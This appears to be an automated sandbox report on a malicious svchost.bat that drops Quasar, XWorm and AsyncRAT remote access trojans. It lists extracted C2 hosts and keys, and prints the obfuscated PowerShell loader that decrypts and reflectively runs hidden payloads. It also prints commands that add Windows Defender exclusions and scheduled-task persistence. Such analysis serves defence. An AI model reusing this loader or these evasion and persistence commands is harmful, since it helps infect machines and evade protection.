Overview

overview

10

Static

static

1

svchost.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-07-2024 13:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    svchost.bat

  • Size

    608KB

  • MD5

    0598b47f8cba2aa8042d5241594a2a18

  • SHA1

    2f9923a0cd52476a33e005156675c19d445a627f

  • SHA256

    edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e

  • SHA512

    146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1

  • SSDEEP

    12288:NK2Dh0mFsRXQ7ZpK1b4Bdbi6EGv8/K9yxnQ3nzvc7l87wrJJ3HMU:Nhjsxb4B0KAxnww7y7+v

Score
10/10
asyncratquasarxwormdefaultslaveexecutionpersistenceratspywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000
Attributes
  • Install_directory

    %ProgramData%

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

finally-grande.gl.at.ply.gg:25844

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

stop-largely.gl.at.ply.gg:27116

Mutex

$Sxr-kl1r656AGsPQksTmi8

Attributes
  • encryption_key

    WyBm1iVkHZmEnGPMAZWV

  • install_name

    $phantom.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    $phantomSTARTUP~MSF

  • subdirectory

    $phantom

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Detect Xworm Payload 5 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:3220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_876_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4348
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4832
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:2428
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4720
                • C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe
                  "C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2148
                • C:\Users\Admin\AppData\Local\Temp\conhost.exe
                  "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:4536
                • C:\Users\Admin\AppData\Local\Temp\7zip.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zip.exe"
                  6⤵
                  • Checks computer location settings
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2416
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4388
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4956
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\7zip.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:4728
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "7zip" /tr "C:\ProgramData\7zip.exe"
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2564
                • C:\Users\Admin\AppData\Local\Temp\wininit.exe
                  "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2196
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3468
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3152
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3432
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2060
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2236
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:3412
      • C:\ProgramData\7zip.exe
        C:\ProgramData\7zip.exe
        1⤵
        • Executes dropped EXE
        PID:3008
      • C:\ProgramData\7zip.exe
        C:\ProgramData\7zip.exe
        1⤵
        • Executes dropped EXE
        PID:1348
      • C:\ProgramData\7zip.exe
        C:\ProgramData\7zip.exe
        1⤵
        • Executes dropped EXE
        PID:3312

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Resource Development

      Reconnaissance

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7zip.exe.log
        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        661739d384d9dfd807a089721202900b

        SHA1

        5b2c5d6a7122b4ce849dc98e79a7713038feac55

        SHA256

        70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

        SHA512

        81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        ade8b780188478d4bf68c97bc995b06f

        SHA1

        0b5124fca500da8f833a3be98bd5f732d3962343

        SHA256

        318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b

        SHA512

        c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        6d42b6da621e8df5674e26b799c8e2aa

        SHA1

        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

        SHA256

        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

        SHA512

        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        72903459f297d1561ed59e88f6266c39

        SHA1

        22275691405b29149354de4bf3a40bd7cef6f6de

        SHA256

        34dd19ebba6598d5f586b5c7ac30babf89d055b5f1a6e959129a39311fe4026b

        SHA512

        6c04ccf522b8b544de9da57b791e7f4a3ff1de200f8a641de106f75270759e04ba028fd6db7e3784bb0233ac3c1f92ec3473d703b9ac585d4851d277d12db10f

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        62d94562013cad250e309b4091503254

        SHA1

        f658f6e53e980694f5ff5bae10455c21ee059a2e

        SHA256

        1ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5

        SHA512

        282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        34f595487e6bfd1d11c7de88ee50356a

        SHA1

        4caad088c15766cc0fa1f42009260e9a02f953bb

        SHA256

        0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

        SHA512

        10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        22310ad6749d8cc38284aa616efcd100

        SHA1

        440ef4a0a53bfa7c83fe84326a1dff4326dcb515

        SHA256

        55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

        SHA512

        2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\7zip.exe
        Filesize

        81KB

        MD5

        6fac9c3612488908d9aa6ed9e8234f9f

        SHA1

        8b36017162e06e76a450e2ecceee4d3a68bb3905

        SHA256

        0ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606

        SHA512

        e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe
        Filesize

        27KB

        MD5

        4daae2de5a31125d02b057c1ff18d58f

        SHA1

        e1d603edfcc150a4718e2916ae3dda3aa9548dc8

        SHA256

        25510f3aa1b879ea92a3cba9583d73e447b8765bae6dfcc4954bb72df5beaa7f

        SHA512

        7cda96a69f9cddab307f3f08e1f38a4d059f0cc7f7119d4a48891efdb01cf101ebcc06cb2ce0702ea2d689d27ee45faddc0a13cd72503c609c4e544919549a2a

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kksidhr4.4rq.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\conhost.exe
        Filesize

        63KB

        MD5

        ec57b49d155e05d971f73e2eb3d3d01f

        SHA1

        f8537e9b44342a71f1f8bf48548b27574f17ff7c

        SHA256

        baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c

        SHA512

        e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\wininit.exe
        Filesize

        409KB

        MD5

        301613f1fcda48ebade4c197175be1a0

        SHA1

        03f58ab72f3c2d991418861adfc9c3b3289640a0

        SHA256

        1772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41

        SHA512

        375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat
        Filesize

        608KB

        MD5

        0598b47f8cba2aa8042d5241594a2a18

        SHA1

        2f9923a0cd52476a33e005156675c19d445a627f

        SHA256

        edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e

        SHA512

        146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs
        Filesize

        115B

        MD5

        995831d3bba7837f1b3acc03ffe50c25

        SHA1

        4223009495a9b47c997162b78bff72c7f4323b57

        SHA256

        465374b758b74b4f969922fa248fcd7d7b83ceade999a21f8c0dacc0787d43f7

        SHA512

        8e12d3372570310e6e0a06d639bd12264efebce809f0f17d9c2ad5bb7a6c79775a975c871e2f8274b23033c3d680f314909cde1465a84b0f86a517d0d42606ed

        Download Submit
      • memory/1248-50-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1248-15-0x000001E19CE00000-0x000001E19CE08000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1248-11-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1248-12-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/1248-13-0x000001E19F270000-0x000001E19F2B4000-memory.dmp
        Filesize

        272KB

        Download
      • memory/1248-14-0x000001E19F340000-0x000001E19F3B6000-memory.dmp
        Filesize

        472KB

        Download
      • memory/1248-6-0x000001E19CDB0000-0x000001E19CDD2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp
        Filesize

        728KB

        Download
      • memory/1248-0-0x00007FFA20523000-0x00007FFA20525000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2148-104-0x0000000001840000-0x0000000001850000-memory.dmp
        Filesize

        64KB

        Download
      • memory/2148-102-0x0000000000F00000-0x0000000000F0E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/2196-108-0x0000000005430000-0x0000000005496000-memory.dmp
        Filesize

        408KB

        Download
      • memory/2196-123-0x0000000006CC0000-0x0000000006CCA000-memory.dmp
        Filesize

        40KB

        Download
      • memory/2196-106-0x0000000005380000-0x0000000005412000-memory.dmp
        Filesize

        584KB

        Download
      • memory/2196-103-0x0000000000A40000-0x0000000000AAC000-memory.dmp
        Filesize

        432KB

        Download
      • memory/2196-109-0x0000000006090000-0x00000000060A2000-memory.dmp
        Filesize

        72KB

        Download
      • memory/2196-110-0x00000000065D0000-0x000000000660C000-memory.dmp
        Filesize

        240KB

        Download
      • memory/2196-105-0x00000000059E0000-0x0000000005F84000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/2416-99-0x0000000000A60000-0x0000000000A7A000-memory.dmp
        Filesize

        104KB

        Download
      • memory/2416-201-0x0000000002C80000-0x0000000002C8E000-memory.dmp
        Filesize

        56KB

        Download
      • memory/4348-32-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4348-29-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4348-28-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4348-18-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4536-97-0x0000000000120000-0x0000000000136000-memory.dmp
        Filesize

        88KB

        Download
      • memory/4720-59-0x0000026E76B80000-0x0000026E76B98000-memory.dmp
        Filesize

        96KB

        Download